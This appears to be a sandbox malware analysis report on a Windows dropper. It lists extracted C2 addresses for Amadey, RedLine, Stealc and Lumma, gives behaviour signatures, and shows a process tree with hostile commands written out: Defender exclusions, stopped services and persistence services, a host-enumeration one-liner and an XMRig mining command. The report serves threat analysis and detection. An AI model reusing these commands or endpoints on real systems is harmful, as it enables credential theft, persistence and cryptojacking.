Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 18:50

General

  • Target

    21512efeefda786fe47cefccb9d05182b8a23b6ced45963e45f754acfc2f3a80.exe

  • Size

    1.8MB

  • MD5

    af7b3b854155813be1f76e94cbd033fe

  • SHA1

    bc1038c7a404cfb726bf2baf98ae97fe1fd601f5

  • SHA256

    21512efeefda786fe47cefccb9d05182b8a23b6ced45963e45f754acfc2f3a80

  • SHA512

    3265ccd1b6c20f726e28d06ef7244e1f2fe34fc8bedfc25ba5e360745d9ed7eda44cfb857184953cdb8b15ef2269c6c51e2dbe514313ad736c55655cbe26e024

  • SSDEEP

    49152:oAQOtwB+2j3z0bjFY8avykwKcHY2vr3peafkcqg:oAjtwk28HFY8avpiY2Tpdfkcqg

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

49e482

C2

http://147.45.47.70

Attributes
  • install_dir

    1b29d73536

  • install_file

    axplont.exe

  • strings_key

    4d31dd1a190d9879c21fac6d87dc0043

  • url_paths

    /tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:40960

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

https://stalfbaclcalorieeis.shop/api

https://civilianurinedtsraov.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 36 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 20 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 50 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21512efeefda786fe47cefccb9d05182b8a23b6ced45963e45f754acfc2f3a80.exe
    "C:\Users\Admin\AppData\Local\Temp\21512efeefda786fe47cefccb9d05182b8a23b6ced45963e45f754acfc2f3a80.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
      "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
        "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\stub.exe
          "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            5⤵
              PID:2628
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2660
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3016
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Windows\system32\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1600
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                6⤵
                • Views/modifies file attributes
                PID:964
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
              5⤵
                PID:4844
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3152
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM chrome.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3864
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4132
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2944
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3488
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Get-Clipboard
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4580
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "chcp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4736
                • C:\Windows\system32\chcp.com
                  chcp
                  6⤵
                    PID:4664
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "chcp"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:636
                  • C:\Windows\system32\chcp.com
                    chcp
                    6⤵
                      PID:1544
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4024
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      6⤵
                      • Gathers system information
                      PID:2820
                    • C:\Windows\system32\HOSTNAME.EXE
                      hostname
                      6⤵
                        PID:1016
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic logicaldisk get caption,description,providername
                        6⤵
                        • Collects information from the system
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4580
                      • C:\Windows\system32\net.exe
                        net user
                        6⤵
                          PID:2680
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user
                            7⤵
                              PID:4328
                          • C:\Windows\system32\query.exe
                            query user
                            6⤵
                              PID:2504
                              • C:\Windows\system32\quser.exe
                                "C:\Windows\system32\quser.exe"
                                7⤵
                                  PID:3632
                              • C:\Windows\system32\net.exe
                                net localgroup
                                6⤵
                                  PID:3768
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 localgroup
                                    7⤵
                                      PID:792
                                  • C:\Windows\system32\net.exe
                                    net localgroup administrators
                                    6⤵
                                      PID:3972
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 localgroup administrators
                                        7⤵
                                          PID:1532
                                      • C:\Windows\system32\net.exe
                                        net user guest
                                        6⤵
                                          PID:4384
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user guest
                                            7⤵
                                              PID:4520
                                          • C:\Windows\system32\net.exe
                                            net user administrator
                                            6⤵
                                              PID:4920
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user administrator
                                                7⤵
                                                  PID:2444
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic startup get caption,command
                                                6⤵
                                                  PID:3868
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /svc
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:704
                                                • C:\Windows\system32\ipconfig.exe
                                                  ipconfig /all
                                                  6⤵
                                                  • Gathers network information
                                                  PID:4308
                                                • C:\Windows\system32\ROUTE.EXE
                                                  route print
                                                  6⤵
                                                    PID:2560
                                                  • C:\Windows\system32\ARP.EXE
                                                    arp -a
                                                    6⤵
                                                      PID:4336
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      netstat -ano
                                                      6⤵
                                                      • Gathers network information
                                                      PID:5028
                                                    • C:\Windows\system32\sc.exe
                                                      sc query type= service state= all
                                                      6⤵
                                                      • Launches sc.exe
                                                      PID:2724
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show state
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2256
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show config
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:1140
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1996
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh wlan show profiles
                                                      6⤵
                                                        PID:1364
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      5⤵
                                                        PID:3768
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          6⤵
                                                            PID:4104
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                          5⤵
                                                            PID:3964
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic csproduct get uuid
                                                              6⤵
                                                                PID:3176
                                                        • C:\Users\Admin\AppData\Local\Temp\1000004001\228.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1000004001\228.exe"
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3476
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
                                                            4⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1632
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              5⤵
                                                              • Enumerates processes with tasklist
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3444
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr /I "wrsa.exe opssvc.exe"
                                                              5⤵
                                                                PID:628
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                5⤵
                                                                • Enumerates processes with tasklist
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3616
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                5⤵
                                                                  PID:1708
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c md 332523
                                                                  5⤵
                                                                    PID:3040
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /V "EnquiryAnContributionRefers" Tank
                                                                    5⤵
                                                                      PID:2560
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b Ph + Shoot 332523\r
                                                                      5⤵
                                                                        PID:4400
                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\332523\Rent.pif
                                                                        332523\Rent.pif 332523\r
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:4928
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping -n 5 127.0.0.1
                                                                        5⤵
                                                                        • Runs ping.exe
                                                                        PID:1784
                                                                  • C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies system certificate store
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3116
                                                                  • C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3596
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      4⤵
                                                                        PID:3924
                                                                    • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      PID:2416
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
                                                                        4⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:2140
                                                                      • C:\Users\Admin\AppData\Local\Temp\1000283001\FirstZ.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1000283001\FirstZ.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in System32 directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3848
                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                          5⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:1172
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                          5⤵
                                                                            PID:3768
                                                                            • C:\Windows\system32\wusa.exe
                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                              6⤵
                                                                                PID:512
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:548
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:4460
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:1500
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop bits
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:792
                                                                            • C:\Windows\system32\sc.exe
                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:1532
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              5⤵
                                                                                PID:1376
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                5⤵
                                                                                  PID:2816
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                  5⤵
                                                                                    PID:4080
                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                    5⤵
                                                                                      PID:4988
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1292
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:5088
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:4104
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                      5⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2560
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2204
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    4⤵
                                                                                      PID:636
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:744
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      • Checks processor information in registry
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1996
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2248
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                                                                      4⤵
                                                                                        PID:388
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          Sc stop GameServerClient
                                                                                          5⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4208
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService remove GameServerClient confirm
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4716
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          Sc delete GameSyncLink
                                                                                          5⤵
                                                                                          • Launches sc.exe
                                                                                          PID:1220
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService remove GameSyncLink confirm
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3040
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5112
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService start GameSyncLink
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3436
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                                                                        4⤵
                                                                                          PID:3616
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            Sc stop GameServerClientC
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3144
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService remove GameServerClientC confirm
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2080
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            Sc delete PiercingNetLink
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1796
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService remove PiercingNetLink confirm
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4452
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2820
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService start PiercingNetLink
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3368
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                                                                          4⤵
                                                                                            PID:2816
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:5112
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                Sc delete GameSyncLinks
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3812
                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                GameService remove GameSyncLinks confirm
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5092
                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1372
                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                GameService start GameSyncLinks
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1532
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                              4⤵
                                                                                                PID:3884
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3712
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                            "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:920
                                                                                            • C:\Windows\Temp\316010.exe
                                                                                              "C:\Windows\Temp\316010.exe" --list-devices
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:2908
                                                                                        • C:\Windows\System32\sihclient.exe
                                                                                          C:\Windows\System32\sihclient.exe /cv eubIf4wSTkihZls/CjOBdA.0.2
                                                                                          1⤵
                                                                                            PID:3768
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2680
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              2⤵
                                                                                                PID:744
                                                                                              • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3040
                                                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                              "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3964
                                                                                              • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:2908
                                                                                                • C:\Windows\Temp\421054.exe
                                                                                                  "C:\Windows\Temp\421054.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:3088
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                              1⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3952
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
